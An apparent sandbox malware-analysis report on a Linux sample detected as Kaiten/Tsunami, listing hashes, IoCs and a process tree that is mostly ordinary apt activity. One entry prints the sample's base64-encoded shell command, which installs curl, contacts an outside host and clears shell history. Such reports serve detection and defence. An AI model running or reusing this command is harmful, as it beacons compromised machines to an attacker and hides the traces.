Analysis
-
max time kernel
82s -
max time network
68s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20231215-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28-12-2023 18:57
General
-
Target
f09c0d5883a221d2e5f762480e946a78
-
Size
42KB
-
MD5
f09c0d5883a221d2e5f762480e946a78
-
SHA1
506386147d393cef81019dda55ac85125914c6be
-
SHA256
0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6
-
SHA512
a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20
-
SSDEEP
768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp family_kaiten -
Reads runtime system information 59 IoCs
Reads data from /proc virtual filesystem.
Processes:
dpkgseddpkgsystemctldpkgdpkgdpkgseddpkgdpkgdpkgdpkgdpkgsediddpkgapt-getcpdpkgdpkgdpkgdpkgfindf09c0d5883a221d2e5f762480e946a78dpkgsedcpdpkgfinddpkgdpkgdpkgdpkgcpseddpkgdpkgcpdpkgdpkgdpkgfinddpkgdpkgdpkgseddpkgseddpkgdpkgfindseddpkgdescription ioc process File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems dpkg File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems id File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/kernel/ngroups_max apt-get File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems find File opened for reading /proc/self/exe f09c0d5883a221d2e5f762480e946a78 File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems find File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems cp File opened for reading /proc/self/fd File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems find File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sed File opened for reading /proc/1/sched systemctl File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems find File opened for reading /proc/filesystems sed File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/filesystems dpkg -
Writes file to tmp directory 48 IoCs
Malware often drops required files in the /tmp directory.
Processes:
apt-getcptouchapt-keyapt-keycpapt-keytouchapt-keycpcptouchtouchdescription ioc File opened for modification /tmp/apt.conf.5ygGiO File opened for modification /tmp/apt.sig.XLvKEk File opened for modification /tmp/fileutl.message.xEIziz apt-get File opened for modification /tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg cp File opened for modification /tmp/fileutl.message.4AWCCT apt-get File opened for modification /tmp/apt.sig.21lb0G File opened for modification /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg touch File opened for modification /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg apt-key File opened for modification /tmp/apt.data.ZoiP0Q File opened for modification /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg apt-key File opened for modification /tmp/fileutl.message.qLPbJp apt-get File opened for modification /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg cp File opened for modification /tmp/fileutl.message.4Am35S apt-get File opened for modification /tmp/fileutl.message.JRDOIu apt-get File opened for modification /tmp/fileutl.message.5mnKDj apt-get File opened for modification /tmp/fileutl.message.PwJMWw apt-get File opened for modification /tmp/apt.sig.XyhbkB File opened for modification /tmp/apt-key-gpghome.Dy6P39OCwo/gpg.1.sh apt-key File opened for modification /tmp/apt.data.lfc2h1 File opened for modification /tmp/fileutl.message.c0t5Gs apt-get File opened for modification /tmp/fileutl.message.Ry5uh4 apt-get File opened for modification /tmp/apt-key-gpghome.o5POtCtfqs/gpg.1.sh apt-key File opened for modification /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg touch File opened for modification /tmp/fileutl.message.p7Idh2 apt-get File opened for modification /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg apt-key File opened for modification /tmp/fileutl.message.TNKeuh apt-get File opened for modification /tmp/fileutl.message.pMwRl6 apt-get File opened for modification /tmp/fileutl.message.MvPvWl apt-get File opened for modification /tmp/fileutl.message.wADoCX apt-get File opened for modification /tmp/apt.data.BIxS8y File opened for modification /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg cp File opened for modification /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg cp File opened for modification /tmp/apt-key-gpghome.PUWKEmdlgl/gpg.1.sh apt-key File opened for modification /tmp/fileutl.message.1fsRhH apt-get File opened for modification /tmp/fileutl.message.VT0HSF apt-get File opened for modification /tmp/fileutl.message.PZb8hV apt-get File opened for modification /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg apt-key File opened for modification /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg touch File opened for modification /tmp/apt-key-gpghome.lP3aH5RXO8/gpg.1.sh apt-key File opened for modification /tmp/apt.conf.g1uyWL File opened for modification /tmp/fileutl.message.QwPGB8 apt-get File opened for modification /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg touch File opened for modification /tmp/apt.conf.TaBuRO File opened for modification /tmp/fileutl.message.lwEEZH apt-get File opened for modification /tmp/fileutl.message.WTFVgK apt-get File opened for modification /tmp/apt.conf.g9ukqV File opened for modification /tmp/apt.data.73Fbeh File opened for modification /tmp/apt.sig.BT4hCo
Processes
-
/tmp/f09c0d5883a221d2e5f762480e946a78/tmp/f09c0d5883a221d2e5f762480e946a781⤵
- Reads runtime system information
-
/bin/shsh -c "echo aWYgISB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gaWYgdHlwZSBhcHQtZ2V0IDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGFwdC1nZXQgdXBkYXRlIC0tZml4LW1pc3NpbmcgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBhcHQtZ2V0IGluc3RhbGwgLXkgY3VybCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IGFwdC1nZXQgaW5zdGFsbCAteSAtLXJlaW5zdGFsbCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkKaWYgdHlwZSB5dW0gMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4geXVtIGNsZWFuIGFsbCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IHl1bSBpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyB5dW0gcmVpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBmaQppZiB0eXBlIGFwayAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbiBhcGsgdXBkYXRlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgYXBrIGFkZCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkgOyBmaSA7IGN1cmwgLXNMayBodHRwOi8vY2hpbWFlcmEuY2MvbG9nL2luZi5waHAgLW8gL2Rldi9udWxsIDsgaGlzdG9yeSAtYyA7IGNsZWFyCgo= | base64 -d | bash"2⤵
-
/usr/bin/base64base64 -d3⤵
-
/bin/bashbash3⤵
-
/usr/bin/apt-getapt-get update --fix-missing4⤵
- Reads runtime system information
- Writes file to tmp directory
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures5⤵
- Reads runtime system information
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http5⤵
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http5⤵
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http5⤵
-
/usr/lib/apt/methods/gpgv/usr/lib/apt/methods/gpgv5⤵
-
/usr/lib/apt/methods/gpgv/usr/lib/apt/methods/gpgv5⤵
-
/bin/shsh -c "[ ! -e /run/systemd/system ] || [ \$(id -u) -ne 0 ] || systemctl start --no-block apt-news.service esm-cache.service || true"1⤵
-
/usr/bin/idid -u2⤵
- Reads runtime system information
-
/bin/systemctlsystemctl start --no-block apt-news.service esm-cache.service2⤵
- Reads runtime system information
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh1⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX2⤵
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.o5POtCtfqs2⤵
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.o5POtCtfqs2⤵
-
/bin/rmrm -f /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg2⤵
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg2⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/2⤵
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"2⤵
- Reads runtime system information
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/cpcp -a /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg /tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.o5POtCtfqs --keyring /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh2⤵
-
/usr/bin/gpgconfgpgconf --kill all2⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR3⤵
-
/bin/rmrm -rf /tmp/apt-key-gpghome.o5POtCtfqs2⤵
-
/usr/bin/sortsort1⤵
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y1⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX2⤵
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.Dy6P39OCwo2⤵
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.Dy6P39OCwo2⤵
-
/bin/rmrm -f /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg2⤵
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg2⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/2⤵
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"2⤵
- Reads runtime system information
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/cpcp -a /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.Dy6P39OCwo --keyring /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y2⤵
-
/usr/bin/gpgconfgpgconf --kill all2⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR3⤵
-
/bin/rmrm -rf /tmp/apt-key-gpghome.Dy6P39OCwo2⤵
-
/usr/bin/sortsort1⤵
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q1⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX2⤵
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.lP3aH5RXO82⤵
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.lP3aH5RXO82⤵
-
/bin/rmrm -f /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg2⤵
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg2⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/2⤵
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"2⤵
- Reads runtime system information
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/cpcp -a /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.lP3aH5RXO8 --keyring /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q2⤵
-
/usr/bin/gpgconfgpgconf --kill all2⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR3⤵
-
/bin/rmrm -rf /tmp/apt-key-gpghome.lP3aH5RXO82⤵
-
/usr/bin/sortsort1⤵
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h11⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX2⤵
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.PUWKEmdlgl2⤵
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.PUWKEmdlgl2⤵
-
/bin/rmrm -f /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg2⤵
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg2⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/2⤵
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"2⤵
- Reads runtime system information
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg2⤵
-
/usr/bin/cmpcmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/catcat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg2⤵
-
/bin/cpcp -a /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.PUWKEmdlgl --keyring /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h12⤵
-
/usr/bin/gpgconfgpgconf --kill all2⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end3⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR3⤵
-
/bin/rmrm -rf /tmp/apt-key-gpghome.PUWKEmdlgl2⤵
-
/usr/bin/sortsort1⤵
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/bin/sedsed -e "s#'#'\"'\"'#g"1⤵
- Reads runtime system information
-
/bin/shsh -c "touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true"1⤵
-
/usr/bin/touchtouch /var/lib/apt/periodic/update-success-stamp2⤵
-
/bin/shsh -c "[ ! -f /var/run/dbus/system_bus_socket ] || /usr/bin/dbus-send --system --dest=org.debian.apt --type=signal /org/debian/apt org.debian.apt.CacheChanged || true"1⤵
-
/bin/shsh -c "/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"1⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/apt-key-gpghome.Dy6P39OCwo/gpg.1.shFilesize
82B
MD5403a4592b82d52a228ca10bed2201abc
SHA1db160c47ed228350fa98b455e69fa02f5f91962c
SHA256d5d5696d70f2da5bf739adcdbd225a13a07533d6bd936aaaf246387d56f02d9a
SHA5124e54ce7dc402757af5c342358922edfd2dcc3892fbe04fb8a44b267169bceadb57b511b34fe2c8b96ba838d455d5b06e8a65abd778b08760bee3836e1333e924
-
/tmp/apt-key-gpghome.PUWKEmdlgl/gpg.1.shFilesize
82B
MD5b0d16da085e293d5d8c5f582e8f156e3
SHA159e10f99212483f624727be2fa9d3afc68e3486a
SHA2564aeeb9c248aa4476f6bb319b45431cb270fd3120a63a15147116959d082920f2
SHA5121a7a1278d88a7b6f7bf338dda4ed156b23062be48b107369ebfc87f63f4a633e9c8a9a592846afd495bc268de6fbbf73e9c8391d15e8d0475f8e5fe9179491f7
-
/tmp/apt-key-gpghome.lP3aH5RXO8/gpg.1.shFilesize
82B
MD5cb8e8f56a0d49d6f8a7ad8c795f596f4
SHA1f18ae53a8e0c4e0da9bc80a1a5b59d8356e789ae
SHA256339ad0c85d47f1e1c56c6260bfcfce8e0278e9d276c59412eba3116cc83f69ec
SHA512f652d8513e8621707acab2b459fecb71deb9609772d0809a234758ce12ce74a59ab1a8e3e523fa1f078a336dc01e7d74e1d155e9d16430d693fde8a4c99dfbee
-
/tmp/apt-key-gpghome.o5POtCtfqs/gpg.1.shFilesize
82B
MD5b591c1d33b54b65eeac2381d7c36886a
SHA1e28b9336eca298cf906eeb278f464b7b1d7e8d3e
